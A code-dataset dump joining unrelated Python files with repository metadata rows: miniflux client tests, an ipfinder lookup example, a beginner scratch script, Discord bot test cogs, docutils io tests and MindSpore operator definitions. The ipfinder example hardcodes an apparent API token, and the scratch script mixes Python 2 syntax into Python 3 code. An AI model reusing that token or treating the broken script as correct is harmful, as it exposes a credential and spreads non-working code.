result = client.refresh_all_feeds()
requests.put.assert_called_once_with('http://localhost/v1/feeds/refresh',
headers=None,
auth=('username', 'password'),
timeout=30)
assert result == expected_result
def test_refresh_feed(self):
requests = _get_request_mock()
expected_result = True
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.put.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.refresh_feed(123)
requests.put.assert_called_once_with('http://localhost/v1/feeds/123/refresh',
headers=None,
auth=('username', 'password'),
timeout=30)
assert result == expected_result
def test_get_feed_entries(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_feed_entries(123)
requests.get.assert_called_once_with('http://localhost/v1/feeds/123/entries',
headers=None,
auth=('username', 'password'),
params=None,
timeout=30)
assert result == expected_result
def test_get_feed_entries_with_direction_param(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_feed_entries(123, direction='asc')
requests.get.assert_called_once_with('http://localhost/v1/feeds/123/entries',
headers=None,
auth=('username', 'password'),
params={'direction': 'asc'},
timeout=30)
assert result == expected_result
def test_mark_feed_as_read(self):
requests = _get_request_mock()
response = mock.Mock()
response.status_code = 204
requests.put.return_value = response
client = miniflux.Client("http://localhost", api_key="secret")
client.mark_feed_entries_as_read(123)
requests.put.assert_called_once_with('http://localhost/v1/feeds/123/mark-all-as-read',
headers={'X-Auth-Token': 'secret'},
auth=None,
timeout=30)
def test_mark_category_entries_as_read(self):
requests = _get_request_mock()
response = mock.Mock()
response.status_code = 204
requests.put.return_value = response
client = miniflux.Client("http://localhost", api_key="secret")
client.mark_category_entries_as_read(123)
requests.put.assert_called_once_with('http://localhost/v1/categories/123/mark-all-as-read',
headers={'X-Auth-Token': 'secret'},
auth=None,
timeout=30)
def test_mark_user_entries_as_read(self):
requests = _get_request_mock()
response = mock.Mock()
response.status_code = 204
requests.put.return_value = response
client = miniflux.Client("http://localhost", api_key="secret")
client.mark_user_entries_as_read(123)
requests.put.assert_called_once_with('http://localhost/v1/users/123/mark-all-as-read',
headers={'X-Auth-Token': 'secret'},
auth=None,
timeout=30)
def test_get_entry(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_entry(123)
requests.get.assert_called_once_with('http://localhost/v1/entries/123',
headers=None,
auth=('username', 'password'),
timeout=30)
assert result == expected_result
def test_get_entries(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_entries(status='unread', limit=10, offset=5)
requests.get.assert_called_once_with('http://localhost/v1/entries',
headers=None,
auth=('username', 'password'),
params=mock.ANY,
timeout=30)
assert result == expected_result
def test_get_entries_with_before_param(self):
param_value = int(time.time())
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_entries(before=param_value)
requests.get.assert_called_once_with('http://localhost/v1/entries',
headers=None,
auth=('username', 'password'),
params={'before': param_value},
timeout=30)
assert result == expected_result
def test_get_entries_with_starred_param(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_entries(starred=True)
requests.get.assert_called_once_with('http://localhost/v1/entries',
headers=None,
auth=('username', 'password'),
params={'starred': True},
timeout=30)
assert result == expected_result
def test_get_entries_with_starred_param_at_false(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_entries(starred=False, after_entry_id=123)
requests.get.assert_called_once_with('http://localhost/v1/entries',
headers=None,
auth=('username', 'password'),
params={'after_entry_id': 123},
timeout=30)
assert result == expected_result
def test_get_user_by_id(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_user_by_id(123)
requests.get.assert_called_once_with('http://localhost/v1/users/123',
headers=None,
auth=('username', 'password'),
timeout=30)
assert result == expected_result
def test_get_user_by_username(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_user_by_username("foobar")
requests.get.assert_called_once_with('http://localhost/v1/users/foobar',
headers=None,
auth=('username', 'password'),
timeout=30)
assert result == expected_result
def test_update_user(self):
requests = _get_request_mock()
expected_result = {"id": 123, "theme": "Black", "language": "fr_FR"}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.put.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.update_user(123, theme="black", language="fr_FR")
requests.put.assert_called_once_with('http://localhost/v1/users/123',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.put.call_args
payload = json.loads(kwargs.get('data'))
self.assertNotIn('username', payload)
self.assertNotIn('password', payload)
self.assertEqual(payload.get("theme"), "black")
self.assertEqual(payload.get("language"), "fr_FR")
self.assertEqual(result, expected_result)
def test_timeout(self):
requests = _get_request_mock()
requests.get.side_effect = Timeout()
client = miniflux.Client("http://localhost", "username", "password", 1.0)
with self.assertRaises(Timeout):
client.export()
requests.get.assert_called_once_with('http://localhost/v1/export',
headers=None,
auth=('username', 'password'),
timeout=1.0)
def test_api_key_auth(self):
requests = _get_request_mock()
response = mock.Mock()
response.status_code = 200
response.json.return_value = {}
requests.get.return_value = response
client = miniflux.Client("http://localhost", api_key="secret")
client.export()
requests.get.assert_called_once_with('http://localhost/v1/export',
headers={'X-Auth-Token': 'secret'},
auth=None,
timeout=30.0)
def _get_request_mock():
patcher = mock.patch('miniflux.requests')
return patcher.start()
| 38.657718 | 111 | 0.556597 |
949d5b3625477a080ea7c34ee2d46c24c2910746 | 147 | py | Python | examples/asn_lookup.py | ipfinder/ip-finder-python | 48ba093801d244c12a4583c138d62c94355baf28 | [
"Apache-2.0"
] | 8 | 2019-07-12T22:20:49.000Z | 2022-03-01T09:03:58.000Z | examples/asn_lookup.py | ipfinder/ip-finder-python | 48ba093801d244c12a4583c138d62c94355baf28 | [
"Apache-2.0"
] | 2 | 2019-08-29T23:24:57.000Z | 2021-02-01T15:15:16.000Z | examples/asn_lookup.py | ipfinder/ip-finder-python | 48ba093801d244c12a4583c138d62c94355baf28 | [
"Apache-2.0"
] | 5 | 2019-07-12T23:01:03.000Z | 2021-07-07T11:11:44.000Z | import ipfinder
con = ipfinder.config('f67f788f8a02a188ec84502e0dff066ed4413a85') # YOUR_TOKEN_GOES_HERE
asn = con.getAsn('as1')
print(asn.all)
| 18.375 | 88 | 0.795918 |
1e4b3540f29d86b723c6ed70db2f21a7e003c1cc | 1,067 | py | Python | temp.py | khanmbjob/python | 8f45db9f0b1e44c12a5ce308b87217d50b57578d | [
"BSD-2-Clause"
] | null | null | null | temp.py | khanmbjob/python | 8f45db9f0b1e44c12a5ce308b87217d50b57578d | [
"BSD-2-Clause"
] | null | null | null | temp.py | khanmbjob/python | 8f45db9f0b1e44c12a5ce308b87217d50b57578d | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import math
print("Hello World")
var1 = [1, 2, 3, 4]
var2 = True
# Create lists first and second
first = [11.25, 18.0, 20.0,9.50,9.50]
second = [10.75, 9.50]
# Paste together first and second: full
full = first + second
# Sort full in descending order: full_sorted
fully_sorted = sorted(full, reverse=False)
# Print out full_sorted
print(fully_sorted)
print("Maximum Value is :", max(fully_sorted))
print(len(fully_sorted))
mystring="hello world"
print(mystring.capitalize())
print(first.index(20.0))
print(first.count(9.50))
print(mystring.index("w"))
print(first.index(9.50))
first.append("My Element")
myint = 12
myresult = myint * math.pi
print(myresult)
count = 0
while (count < 9):
print('The count is:', count)
count = count + 1
print("Good bye!")
var = 1
while var == 1 : # This constructs an infinite loop
num = raw_input("Enter a number :")
print("You entered: ", num)
print"Good bye!"
| 17.783333 | 53 | 0.639175 |
cc12bac78eeeed068333b537ca5cd06dd194cb3a | 3,194 | py | Python | Tests/testCogs.py | Inkapa/discord-quiz-bot | c7e459b62f15bce649d0828c8b5d1e0a17610cc1 | [
"MIT"
] | null | null | null | Tests/testCogs.py | Inkapa/discord-quiz-bot | c7e459b62f15bce649d0828c8b5d1e0a17610cc1 | [
"MIT"
] | null | null | null | Tests/testCogs.py | Inkapa/discord-quiz-bot | c7e459b62f15bce649d0828c8b5d1e0a17610cc1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Jun 5 11:59:04 2021
@author: Liam
"""
from discord.ext import commands
import aiosqlite
import sqlite3
from database import Utilisateur, Quiz
class TestUtilisateur(commands.Cog):
def __init__(self, client, sourceDb):
self.client = client
self.source = sourceDb
@commands.command()
async def initUser(self, ctx):
async with aiosqlite.connect(self.source) as db:
db.row_factory = sqlite3.Row
user = await Utilisateur.get(ctx.author.id, db)
name = await user.getName()
idD = await user.getIdDiscord()
score = await user.getScoreTotal()
rep = len(await user.getReponses())
quizs = len(await user.getQuizs())
nbInst = await user.getNbParticipations()
text = f"""
Hey there {name}, your id is {idD}
Your total score is {score} points
You have {rep} responses and you have created {quizs} quizs
You have participated to {nbInst} games
"""
await ctx.send(text)
@commands.command()
async def leaderboard(self, ctx):
async with aiosqlite.connect(self.source) as db:
db.row_factory = sqlite3.Row
text = ""
leader = await Utilisateur.getLeaderboard(db)
for user in leader:
text += await user.getName() + " : " + str(await user.getScoreTotal()) + " points\n"
await ctx.send(text)
@commands.command()
async def addPoints(self, ctx):
async with aiosqlite.connect(self.source) as db:
db.row_factory = sqlite3.Row
user = await Utilisateur.get(ctx.author.id, db)
await user.addPoints(10)
await ctx.send(str(await user.getScoreTotal()) + " points")
class TestQuiz(commands.Cog):
def __init__(self, client, sourceDb):
self.client = client
self.source = sourceDb
@commands.command()
async def createQuiz(self, ctx, titre, points):
async with aiosqlite.connect(self.source) as db:
db.row_factory = sqlite3.Row
quiz = await Quiz.create(titre, points, ctx.author.id, db)
titre = await quiz.getTitre()
quizId = await quiz.getIdQuiz()
instanceCount = await quiz.getInstanceCount()
points = await quiz.getPoints()
text = f"""
Quiz id: {quizId}
Title: {titre}
Number of instances: {instanceCount}
Points: {points}
"""
await ctx.send(text)
user = await quiz.getCreator()
name = await user.getName()
idD = await user.getIdDiscord()
score = await user.getScoreTotal()
rep = len(await user.getReponses(ctx.author.id))
quizs = len(await user.getQuizs())
nbInst = await user.getNbParticipations()
text = f"""
Quiz creator: {name}, his id is {idD}
His total score is {score} points
He has {rep} responses and has created {quizs} quizs
You have participated to {nbInst} games
"""
await ctx.send(text)
| 33.621053 | 100 | 0.584847 |
c7ce5d3a2c86f696b67e93fc681015640a5d6b59 | 2,105 | py | Python | docs/build/docutils/test/test_io.py | mjtamlyn/django-braces | 8adc9bc4f5139e3d032d4e38657bf86413388b78 | [
"BSD-3-Clause"
] | 1 | 2015-03-22T16:49:07.000Z | 2015-03-22T16:49:07.000Z | docs/build/docutils/test/test_io.py | mjtamlyn/django-braces | 8adc9bc4f5139e3d032d4e38657bf86413388b78 | [
"BSD-3-Clause"
] | null | null | null | docs/build/docutils/test/test_io.py | mjtamlyn/django-braces | 8adc9bc4f5139e3d032d4e38657bf86413388b78 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
# $Id: test_io.py 7037 2011-05-19 08:56:27Z milde $
# Author: Lea Wiemann <LeWiemann@gmail.com>
# Copyright: This module has been placed in the public domain.
"""
Test module for io.py.
"""
import unittest, sys
import DocutilsTestSupport # must be imported before docutils
from docutils import io
from docutils._compat import b, bytes
class InputTests(unittest.TestCase):
def test_bom(self):
input = io.StringInput(source=b('\xef\xbb\xbf foo \xef\xbb\xbf bar'),
encoding='utf8')
# Assert BOMs are gone.
self.assertEquals(input.read(), u' foo bar')
# With unicode input:
input = io.StringInput(source=u'\ufeff foo \ufeff bar')
# Assert BOMs are still there.
self.assertEquals(input.read(), u'\ufeff foo \ufeff bar')
def test_coding_slug(self):
input = io.StringInput(source=b("""\
.. -*- coding: ascii -*-
data
blah
"""))
data = input.read()
self.assertEquals(input.successful_encoding, 'ascii')
input = io.StringInput(source=b("""\
#! python
# -*- coding: ascii -*-
print "hello world"
"""))
data = input.read()
self.assertEquals(input.successful_encoding, 'ascii')
input = io.StringInput(source=b("""\
#! python
# extraneous comment; prevents coding slug from being read
# -*- coding: ascii -*-
print "hello world"
"""))
data = input.read()
self.assertNotEquals(input.successful_encoding, 'ascii')
def test_bom_detection(self):
source = u'\ufeffdata\nblah\n'
input = io.StringInput(source=source.encode('utf-16-be'))
data = input.read()
self.assertEquals(input.successful_encoding, 'utf-16-be')
input = io.StringInput(source=source.encode('utf-16-le'))
data = input.read()
self.assertEquals(input.successful_encoding, 'utf-16-le')
input = io.StringInput(source=source.encode('utf-8'))
data = input.read()
self.assertEquals(input.successful_encoding, 'utf-8')
if __name__ == '__main__':
unittest.main()
| 30.955882 | 77 | 0.633729 |
2e4fffcd486575a2b329c7c6afd78aef330f2295 | 29,550 | py | Python | mindspore/ops/operations/other_ops.py | Vincent34/mindspore | a39a60878a46e7e9cb02db788c0bca478f2fa6e5 | [
"Apache-2.0"
] | 1 | 2021-07-03T06:52:20.000Z | 2021-07-03T06:52:20.000Z | mindspore/ops/operations/other_ops.py | Vincent34/mindspore | a39a60878a46e7e9cb02db788c0bca478f2fa6e5 | [
"Apache-2.0"
] | null | null | null | mindspore/ops/operations/other_ops.py | Vincent34/mindspore | a39a60878a46e7e9cb02db788c0bca478f2fa6e5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Other operators."""
import functools
from mindspore.common import monad
from mindspore.common._decorator import deprecated
from .. import signature as sig
from ..._checkparam import Validator as validator, Rel
from ...common import dtype as mstype
from ..primitive import Primitive, PrimitiveWithCheck, PrimitiveWithInfer, prim_attr_register
class Assign(Primitive):
"""
Assigns `Parameter` with a value.
Inputs of `variable` and `value` comply with the implicit type conversion rules to make the data types consistent.
If they have different data types, lower priority data type will be converted to
relatively highest priority data type.
RuntimeError exception will be thrown when the data type conversion of Parameter is required.
Inputs:
- **variable** (Parameter) - The `Parameter`.
:math:`(N,*)` where :math:`*` means ,any number of additional dimensions, its rank should less than 8.
- **value** (Tensor) - The value to be assigned, has the same shape with `variable`.
Outputs:
Tensor, has the same data type and shape as original `variable`.
Raises:
TypeError: If `variable` is not a Parameter.
TypeError: If `value` is not a Tensor.
Supported Platforms:
``Ascend`` ``GPU`` ``CPU``
Examples:
>>> class Net(nn.Cell):
... def __init__(self):
... super(Net, self).__init__()
... self.y = mindspore.Parameter(Tensor([1.0], mindspore.float32), name="y")
...
... def construct(self, x):
... ops.Assign()(self.y, x)
... return self.y
...
>>> x = Tensor([2.0], mindspore.float32)
>>> net = Net()
>>> output = net(x)
>>> print(output)
[2.]
"""
__mindspore_signature__ = (
sig.make_sig('variable', sig.sig_rw.RW_WRITE, dtype=sig.sig_dtype.T),
sig.make_sig('value', dtype=sig.sig_dtype.T),
sig.make_sig('u', default=monad.U, dtype=sig.sig_dtype.T1)
)
@prim_attr_register
def __init__(self):
"""Initialize Assign."""
self.init_prim_io_names(inputs=['ref', 'value'], outputs=['output'])
self.add_prim_attr('side_effect_mem', True)
class InplaceAssign(PrimitiveWithInfer):
"""
Inplace assign `Parameter` with a value.
This primitive can only use in graph kernel.
InplaceAssign is deprecated from version 1.3 and will be removed in a future version, use Assign instead.
Inputs:
- **variable** (Parameter) - The `Parameter`.
- **value** (Tensor) - The value to be assigned.
- **depend** (Tensor) - The dependent tensor to keep this op connected in graph.
Outputs:
Tensor, has the same type as original `variable`.
Raises:
TypeError: If `value` or `depend` is not a Tensor.
Examples:
>>> class Net(nn.Cell):
... def __init__(self):
... super(Net, self).__init__()
... self.inplace_assign = ops.InplaceAssign()
...
... def construct(self, x):
... val = x - 1.0
... ret = x + 2.0
... return self.inplace_assign(x, val, ret)
...
>>> x = Tensor([2.0], mindspore.float32)
>>> net = Net()
>>> output = net(x)
>>> print(output)
"""
@deprecated("1.3", "Assign", False)
@ prim_attr_register
def __init__(self):
"""Initialize InplaceAssign."""
self.init_prim_io_names(inputs=['x', 'y', 'z'], outputs=['output'])
def infer_shape(self, x, y, z):
return z
def infer_dtype(self, x, y, z):
return z
class Load(PrimitiveWithCheck):
"""
Load `Parameter` to a value.
Inputs:
- **variable** (Parameter) - The `Parameter`.
Outputs:
Tensor - The loaded parameter tensor value.
"""
__mindspore_signature__ = (
sig.make_sig('variable', sig.sig_rw.RW_READ, dtype=sig.sig_dtype.T),
sig.make_sig('u', dtype=sig.sig_dtype.T1)
)
@prim_attr_register
def __init__(self):
"""Initialize Load."""
self.init_prim_io_names(inputs=['ref', 'u'], outputs=['output'])
def check_dtype(self, variable):
if variable != mstype.type_refkey:
validator.check_tensors_dtypes_same_and_valid({"variable": variable}, mstype.number_type, self.name)
class BoundingBoxEncode(PrimitiveWithInfer):
"""
Encodes bounding boxes locations.
Args:
means (tuple): Means for encoding bounding boxes calculation. Default: (0.0, 0.0, 0.0, 0.0).
stds (tuple): The standard deviations of deltas calculation. Default: (1.0, 1.0, 1.0, 1.0).
Inputs:
- **anchor_box** (Tensor) - Anchor boxes. The shape of anchor_box must be (n, 4).
- **groundtruth_box** (Tensor) - Ground truth boxes. Which has the same shape with anchor_box.
Outputs:
Tensor, encoded bounding boxes.
Raises:
TypeError: If `means` or `stds` is not a tuple.
TypeError: If `anchor_box` or `groundtruth_box` is not a Tensor.
Supported Platforms:
``Ascend`` ``GPU``
Examples:
>>> anchor_box = Tensor([[2, 2, 2, 3], [2, 2, 2, 3]], mindspore.float32)
>>> groundtruth_box = Tensor([[1, 2, 1, 4], [1, 2, 1, 4]], mindspore.float32)
>>> boundingbox_encode = ops.BoundingBoxEncode(means=(0.0, 0.0, 0.0, 0.0), stds=(1.0, 1.0, 1.0, 1.0))
>>> output = boundingbox_encode(anchor_box, groundtruth_box)
>>> print(output)
[[ -1. 0.25 0. 0.40551758]
[ -1. 0.25 0. 0.40551758]]
"""
@prim_attr_register
def __init__(self, means=(0.0, 0.0, 0.0, 0.0), stds=(1.0, 1.0, 1.0, 1.0)):
"""Initialize BoundingBoxEncode."""
validator.check_value_type('means', means, tuple, self.name)
validator.check_value_type('stds', stds, tuple, self.name)
for i, value in enumerate(means):
validator.check_value_type("means[%d]" % i, value, [float], self.name)
for i, value in enumerate(stds):
validator.check_value_type("stds[%d]" % i, value, [float], self.name)
validator.check_equal_int(len(means), 4, "means len", self.name)
validator.check_equal_int(len(stds), 4, "stds len", self.name)
def infer_shape(self, anchor_box, groundtruth_box):
validator.check('anchor_box shape[0]', anchor_box[0], 'groundtruth_box shape[0]', groundtruth_box[0], Rel.EQ,
self.name)
validator.check("anchor_box rank", len(anchor_box), "", 2, Rel.EQ, self.name)
validator.check("groundtruth_box rank", len(groundtruth_box), "", 2, Rel.EQ, self.name)
validator.check_equal_int(anchor_box[1], 4, 'anchor_box shape[1]', self.name)
validator.check_equal_int(groundtruth_box[1], 4, 'groundtruth_box shape[1]', self.name)
return anchor_box
def infer_dtype(self, anchor_box, groundtruth_box):
args = {"anchor_box": anchor_box, "groundtruth_box": groundtruth_box}
validator.check_tensors_dtypes_same_and_valid(args, mstype.number_type, self.name)
return anchor_box
class BoundingBoxDecode(PrimitiveWithInfer):
"""
Decodes bounding boxes locations.
Args:
means (tuple): The means of deltas calculation. Default: (0.0, 0.0, 0.0, 0.0).
stds (tuple): The standard deviations of deltas calculation. Default: (1.0, 1.0, 1.0, 1.0).
max_shape (tuple): The max size limit for decoding box calculation.
wh_ratio_clip (float): The limit of width and height ratio for decoding box calculation. Default: 0.016.
Inputs:
- **anchor_box** (Tensor) - Anchor boxes. The shape of `anchor_box` must be (n, 4).
- **deltas** (Tensor) - Delta of boxes. Which has the same shape with `anchor_box`.
Outputs:
Tensor, decoded boxes.
Raises:
TypeError: If `means`, `stds` or `max_shape` is not a tuple.
TypeError: If `wh_ratio_clip` is not a float.
TypeError: If `anchor_box` or `deltas` is not a Tensor.
Supported Platforms:
``Ascend`` ``GPU``
Examples:
>>> anchor_box = Tensor([[4, 1, 2, 1], [2, 2, 2, 3]], mindspore.float32)
>>> deltas = Tensor([[3, 1, 2, 2], [1, 2, 1, 4]], mindspore.float32)
>>> boundingbox_decode = ops.BoundingBoxDecode(means=(0.0, 0.0, 0.0, 0.0), stds=(1.0, 1.0, 1.0, 1.0),
... max_shape=(768, 1280), wh_ratio_clip=0.016)
>>> output = boundingbox_decode(anchor_box, deltas)
>>> print(output)
[[ 4.1953125 0. 0. 5.1953125]
[ 2.140625 0. 3.859375 60.59375 ]]
"""
@prim_attr_register
def __init__(self, max_shape, means=(0.0, 0.0, 0.0, 0.0), stds=(1.0, 1.0, 1.0, 1.0), wh_ratio_clip=0.016):
"""Initialize BoundingBoxDecode."""
validator.check_value_type('means', means, tuple, self.name)
validator.check_value_type('stds', stds, tuple, self.name)
for i, value in enumerate(means):
validator.check_value_type("means[%d]" % i, value, [float], self.name)
for i, value in enumerate(stds):
validator.check_value_type("stds[%d]" % i, value, [float], self.name)
validator.check_value_type('wh_ratio_clip', wh_ratio_clip, [float], self.name)
validator.check_equal_int(len(means), 4, "means len", self.name)
validator.check_equal_int(len(stds), 4, "stds len", self.name)
if max_shape is not None:
validator.check_value_type('max_shape', max_shape, [tuple], self.name)
validator.check_equal_int(len(max_shape), 2, "max_shape len", self.name)
def infer_shape(self, anchor_box, deltas):
validator.check('anchor_box shape[0]', anchor_box[0], 'deltas shape[0]', deltas[0], Rel.EQ, self.name)
validator.check("anchor_box rank", len(anchor_box), "", 2, Rel.EQ, self.name)
validator.check("deltas rank", len(deltas), "", 2, Rel.EQ, self.name)
validator.check_equal_int(anchor_box[1], 4, 'anchor_box shape[1]', self.name)
validator.check_equal_int(deltas[1], 4, 'deltas shape[1]', self.name)
return anchor_box
def infer_dtype(self, anchor_box, deltas):
args = {"anchor_box": anchor_box, "deltas": deltas}
validator.check_tensors_dtypes_same_and_valid(args, mstype.number_type, self.name)
return anchor_box
class CheckValid(PrimitiveWithInfer):
"""
Checks bounding box.
Checks whether the bounding box cross data and data border are valid.
Inputs:
- **bboxes** (Tensor) - Bounding boxes tensor with shape (N, 4). Data type must be float16 or float32.
- **img_metas** (Tensor) - Raw image size information with the format of (height, width, ratio).
Data type must be float16 or float32.
Outputs:
Tensor, with shape of (N,) and dtype of bool.
Raises:
TypeError: If `bboxes` or `img_metas` is not a Tensor.
TypeError: If dtype of `bboxes` or `img_metas` is neither float16 nor float32.
Supported Platforms:
``Ascend`` ``GPU``
Examples:
>>> import mindspore
>>> import mindspore.nn as nn
>>> import numpy as np
>>> from mindspore import Tensor
>>> from mindspore.ops import operations as ops
>>> class Net(nn.Cell):
... def __init__(self):
... super(Net, self).__init__()
... self.check_valid = ops.CheckValid()
... def construct(self, x, y):
... valid_result = self.check_valid(x, y)
... return valid_result
...
>>> bboxes = Tensor(np.linspace(0, 6, 12).reshape(3, 4), mindspore.float32)
>>> img_metas = Tensor(np.array([2, 1, 3]), mindspore.float32)
>>> net = Net()
>>> output = net(bboxes, img_metas)
>>> print(output)
[ True False False]
"""
@prim_attr_register
def __init__(self):
"""Initialize CheckValid."""
self.init_prim_io_names(inputs=['bboxes', 'img_metas'], outputs=['output'])
def infer_shape(self, bboxes_shape, metas_shape):
validator.check("bboxes rank", len(bboxes_shape), "", 2, Rel.EQ, self.name)
validator.check("bboxes_shape[-1]", bboxes_shape[-1], "", 4, Rel.EQ, self.name)
validator.check("img_metas rank", len(metas_shape), "", 1, Rel.EQ, self.name)
validator.check("img_metas shape[0]", metas_shape[0], "", 3, Rel.EQ, self.name)
return bboxes_shape[:-1]
def infer_dtype(self, bboxes_type, metas_type):
valid_type = [mstype.float32, mstype.float16, mstype.int16, mstype.uint8]
validator.check_tensor_dtype_valid("bboxes_type", bboxes_type, valid_type, self.name)
validator.check_tensor_dtype_valid("metas_type", metas_type, valid_type, self.name)
return mstype.bool_
class IOU(PrimitiveWithInfer):
r"""
Calculates intersection over union for boxes.
Computes the intersection over union (IOU) or the intersection over foreground (IOF) based on the ground-truth and
predicted regions.
.. math::
\text{IOU} = \frac{\text{Area of Overlap}}{\text{Area of Union}}
\text{IOF} = \frac{\text{Area of Overlap}}{\text{Area of Ground Truth}}
Args:
mode (string): The mode is used to specify the calculation method,
now supporting 'iou' (intersection over union) or 'iof'
(intersection over foreground) mode. Default: 'iou'.
Inputs:
- **anchor_boxes** (Tensor) - Anchor boxes, tensor of shape (N, 4). "N" indicates the number of anchor boxes,
and the value "4" refers to "x0", "y0", "x1", and "y1". Data type must be float16 or float32.
- **gt_boxes** (Tensor) - Ground truth boxes, tensor of shape (M, 4). "M" indicates the number of ground
truth boxes, and the value "4" refers to "x0", "y0", "x1", and "y1". Data type must be float16 or float32.
Outputs:
Tensor, the 'iou' values, tensor of shape (M, N), with the same data type as `anchor_boxes`.
Raises:
KeyError: When `mode` is not 'iou' or 'iof'.
Supported Platforms:
``Ascend`` ``GPU`` ``CPU``
Examples:
>>> iou = ops.IOU()
>>> anchor_boxes = Tensor(np.random.randint(1.0, 5.0, [3, 4]), mindspore.float16)
>>> gt_boxes = Tensor(np.random.randint(1.0, 5.0, [3, 4]), mindspore.float16)
>>> output = iou(anchor_boxes, gt_boxes)
>>> print(output.shape)
(3, 3)
"""
@prim_attr_register
def __init__(self, mode='iou'):
"""Initialize IOU."""
if mode not in {'iou', 'iof'}:
raise KeyError("Mode only support 'iou' or 'iof'.")
self.init_prim_io_names(inputs=['anchor_boxes', 'gt_boxes'], outputs=['overlap'])
def infer_shape(self, anchor_boxes, gt_boxes):
validator.check_equal_int(gt_boxes[1], 4, 'gt_boxes shape[1]', self.name)
validator.check_equal_int(anchor_boxes[1], 4, 'anchor_boxes shape[1]', self.name)
validator.check_equal_int(len(anchor_boxes), 2, 'anchor_boxes rank', self.name)
validator.check_equal_int(len(gt_boxes), 2, 'gt_boxes rank', self.name)
iou = [gt_boxes[0], anchor_boxes[0]]
return iou
def infer_dtype(self, anchor_boxes, gt_boxes):
valid_type = [mstype.float32, mstype.float16]
validator.check_tensor_dtype_valid("anchor_boxes", anchor_boxes, valid_type, self.name)
validator.check_tensor_dtype_valid("gt_boxes", gt_boxes, valid_type, self.name)
return anchor_boxes
class Partial(Primitive):
"""
Makes a partial function instance, used for pynative mode.
Inputs:
- **args** (Union[FunctionType, Tensor]) - The function and bind arguments.
Outputs:
FunctionType, partial function binded with arguments.
"""
# Side effect will propagated from the first argument to return value.
side_effect_propagate = 1
@prim_attr_register
def __init__(self):
"""Initialize Partial."""
self.add_prim_attr('side_effect_propagate', 1)
def __call__(self, *args):
func = args[0].__call__
partial_func = functools.partial(func, *args[1:])
return partial_func
class Depend(Primitive):
"""
Depend is used for processing dependency operations.
In most scenarios, if operators have IO side effects or memory side effects,
they will be executed according to the user's semantics. In some scenarios,
if the two operators A and B have no order dependency, and A must be executed
before B, we recommend using Depend to specify their execution order. The
usage method is as follows::
a = A(x) ---> a = A(x)
b = B(y) ---> y = Depend(y, a)
---> b = B(y)
Inputs:
- **value** (Tensor) - the real value to return for depend operator.
- **expr** (Expression) - the expression to execute with no outputs.
Outputs:
Tensor, the value passed by last operator.
Supported Platforms:
``Ascend`` ``GPU`` ``CPU``
Examples:
>>> import numpy as np
>>> import mindspore
>>> import mindspore.nn as nn
>>> import mindspore.ops.operations as P
>>> from mindspore import Tensor
>>> class Net(nn.Cell):
... def __init__(self):
... super(Net, self).__init__()
... self.softmax = P.Softmax()
... self.depend = P.Depend()
...
... def construct(self, x, y):
... mul = x * y
... y = self.depend(y, mul)
... ret = self.softmax(y)
... return ret
...
>>> x = Tensor(np.ones([4, 5]), dtype=mindspore.float32)
>>> y = Tensor(np.ones([4, 5]), dtype=mindspore.float32)
>>> net = Net()
>>> output = net(x, y)
>>> print(output)
[[0.2 0.2 0.2 0.2 0.2]
[0.2 0.2 0.2 0.2 0.2]
[0.2 0.2 0.2 0.2 0.2]
[0.2 0.2 0.2 0.2 0.2]]
"""
# Side effect will propagated from the first argument to return value.
side_effect_propagate = 1
@prim_attr_register
def __init__(self):
"""Initialize Depend."""
self.add_prim_attr('side_effect_propagate', 1)
def __call__(self, value, expr):
return value
class UpdateState(Primitive):
"""
UpdateState is used for update side-effect state.
Inputs:
- **value** (State) - the state value to be updated.
- **expr** (Expression) - the expression to evaluate before state changes.
Outputs:
State, the updated state value.
"""
@prim_attr_register
def __init__(self):
pass
def __call__(self, state, expr):
return state
class CheckBprop(PrimitiveWithInfer):
"""
Checks whether the data type and the shape of corresponding elements from tuples x and y are the same.
Inputs:
